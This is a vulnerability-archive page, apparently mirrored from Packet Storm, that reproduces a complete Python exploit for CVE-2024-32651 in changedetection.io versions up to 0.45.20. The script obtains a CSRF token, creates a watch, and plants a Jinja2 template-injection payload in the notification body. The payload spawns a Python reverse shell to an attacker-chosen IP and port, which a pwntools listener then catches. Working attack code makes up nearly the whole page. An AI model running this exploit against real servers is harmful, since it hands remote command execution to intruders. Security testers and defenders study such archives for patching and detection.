Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormZach CrosmanPACKETSTORM:178878
HistoryMay 31, 2024 - 12:00 a.m.

changedetection 0.45.20 Remote Code Execution

2024-05-3100:00:00
Zach Crosman
packetstormsecurity.com
40
remote code execution
changedetection.io
csrf token
notification url
linux
cve-2024-32651
python
requests
beautifulsoup
argsparser

7.1 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

29.1%

JSON
`# Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE)  
# Date: 5-26-2024  
# Exploit Author: Zach Crosman (zcrosman)  
# Vendor Homepage: changedetection.io  
# Software Link: https://github.com/dgtlmoon/changedetection.io  
# Version: <= 0.45.20  
# Tested on: Linux  
# CVE : CVE-2024-32651  
  
from pwn import *  
import requests  
from bs4 import BeautifulSoup  
import argparse  
  
def start_listener(port):  
listener = listen(port)  
print(f"Listening on port {port}...")  
conn = listener.wait_for_connection()  
print("Connection received!")  
context.newline = b'\r\n'  
# Switch to interactive mode  
conn.interactive()  
  
def add_detection(url, listen_ip, listen_port, notification_url=''):  
session = requests.Session()  
  
# First request to get CSRF token  
request1_headers = {  
"Cache-Control": "max-age=0",  
"Upgrade-Insecure-Requests": "1",  
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",  
"Accept-Encoding": "gzip, deflate",  
"Accept-Language": "en-US,en;q=0.9",  
"Connection": "close"  
}  
  
response = session.get(url, headers=request1_headers)  
soup = BeautifulSoup(response.text, 'html.parser')  
csrf_token = soup.find('input', {'name': 'csrf_token'})['value']  
print(f'Obtained CSRF token: {csrf_token}')  
  
# Second request to submit the form and get the redirect URL  
add_url = f"{url}/form/add/quickwatch"  
add_url_headers = { # Define add_url_headers here  
"Origin": url,  
"Content-Type": "application/x-www-form-urlencoded"  
}  
add_url_data = {  
"csrf_token": csrf_token,  
"url": "https://reddit.com/r/baseball",  
"tags": '',  
"edit_and_watch_submit_button": "Edit > Watch",  
"processor": "text_json_diff"  
}  
  
post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False)  
  
# Extract the URL from the Location header  
if 'Location' in post_response.headers:  
redirect_url = post_response.headers['Location']  
print(f'Redirect URL: {redirect_url}')  
else:  
print('No redirect URL found')  
return  
  
# Third request to add the changedetection url with ssti in notification config  
save_detection_url = f"{url}{redirect_url}"  
save_detection_headers = { # Define save_detection_headers here  
"Referer": redirect_url,  
"Cookie": f"session={session.cookies.get('session')}"  
}  
  
save_detection_data = {  
"csrf_token": csrf_token,  
"url": "https://reddit.com/r/all",  
"title": '',  
"tags": '',  
"time_between_check-weeks": '',  
"time_between_check-days": '',  
"time_between_check-hours": '',  
"time_between_check-minutes": '',  
"time_between_check-seconds": '30',  
"filter_failure_notification_send": 'y',  
"fetch_backend": 'system',  
"webdriver_delay": '',  
"webdriver_js_execute_code": '',  
"method": 'GET',  
"headers": '',  
"body": '',  
"notification_urls": notification_url,  
"notification_title": '',  
"notification_body": f"""  
{{% for x in ().__class__.__base__.__subclasses__() %}}  
{{% if "warning" in x.__name__ %}}  
{{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}  
{{% endif %}}  
{{% endfor %}}  
""",  
"notification_format": 'System default',  
"include_filters": '',  
"subtractive_selectors": '',  
"filter_text_added": 'y',  
"filter_text_replaced": 'y',  
"filter_text_removed": 'y',  
"trigger_text": '',  
"ignore_text": '',  
"text_should_not_be_present": '',  
"extract_text": '',  
"save_button": 'Save'  
}  
final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data)  
  
print('Final request made.')  
  
if __name__ == "__main__":  
parser = argparse.ArgumentParser(description='Add detection and start listener')  
parser.add_argument('--url', type=str, required=True, help='Base URL of the target site')  
parser.add_argument('--port', type=int, help='Port for the listener', default=4444)  
parser.add_argument('--ip', type=str, required=True, help='IP address for the listener')  
parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default')  
args = parser.parse_args()  
  
  
add_detection(args.url, args.ip, args.port, args.notification)  
start_listener(args.port)  
  
  
`

Related

cve 1
nuclei 1
veracode 1
nvd 1
zdt 1
cvelist 1
vulnrichment 1
exploitdb 1
cve
cve
CVE-2024-32651
2024-04-26 00:15:08
nuclei
nuclei
Change Detection - Server Side Template Injection
2024-04-29 14:36:08
veracode
veracode
Server Side Template Injection
2024-04-29 07:05:16
nvd
nvd
CVE-2024-32651
2024-04-26 00:15:08
zdt
zdt
changedetection 0.45.20 Remote Code Execution Exploit
2024-06-02 00:00:00
cvelist
cvelist
CVE-2024-32651 Server Side Template Injection in Jinja2 allows Remote Command Execution
2024-04-25 23:49:28
vulnrichment
vulnrichment
CVE-2024-32651 Server Side Template Injection in Jinja2 allows Remote Command Execution
2024-04-25 23:49:28
exploitdb
exploitdb
changedetection &lt; 0.45.20 - Remote Code Execution (RCE)
2024-05-31 00:00:00

7.1 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

29.1%

JSON
Related for PACKETSTORM:178878
cve1nuclei1veracode1nvd1zdt1cvelist1vulnrichment1exploitdb1